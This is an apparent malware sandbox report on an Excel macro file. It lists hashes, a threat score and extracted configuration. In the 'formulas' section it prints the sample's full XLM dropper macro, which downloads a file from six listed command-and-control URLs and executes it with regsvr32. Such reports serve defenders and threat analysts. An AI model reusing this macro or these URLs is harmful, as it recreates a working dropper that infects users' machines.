Overview

overview

10

Static

static

10

9f0544b42d...9.xlsm

windows7-x64

10

9f0544b42d...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9f0544b42de52bec86c757cf69aeae630eef4bc69b3230b288a6d5675e65dec9

  • Size

    45KB

  • Sample

    241120-q1fgzsxpa1

  • MD5

    99634122994c9f4feae8c02ca8f21487

  • SHA1

    b63e49bbfe6ccc5b4834e555915a42cb9f8d67e6

  • SHA256

    9f0544b42de52bec86c757cf69aeae630eef4bc69b3230b288a6d5675e65dec9

  • SHA512

    d9c263c0e41fbdd93ef1ccc99722bc1eb24c324c97252c57c6dee625d7f502bda503551d22cc6992deba599bf556f9a44a55ee06be22d5b2bb0d5af6caf68c31

  • SSDEEP

    768:KqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:ZrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/

http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/

http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

https://getlivetext.com/Pectinacea/AL5FVpjleCW/

http://janshabd.com/Zgye2/

https://justforanime.com/stratose/PonwPXCl/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/Zgye2/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://justforanime.com/stratose/PonwPXCl/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/
xlm40.dropper

http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/
xlm40.dropper

http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

Targets

    • Target

      9f0544b42de52bec86c757cf69aeae630eef4bc69b3230b288a6d5675e65dec9

    • Size

      45KB

    • MD5

      99634122994c9f4feae8c02ca8f21487

    • SHA1

      b63e49bbfe6ccc5b4834e555915a42cb9f8d67e6

    • SHA256

      9f0544b42de52bec86c757cf69aeae630eef4bc69b3230b288a6d5675e65dec9

    • SHA512

      d9c263c0e41fbdd93ef1ccc99722bc1eb24c324c97252c57c6dee625d7f502bda503551d22cc6992deba599bf556f9a44a55ee06be22d5b2bb0d5af6caf68c31

    • SSDEEP

      768:KqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:ZrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks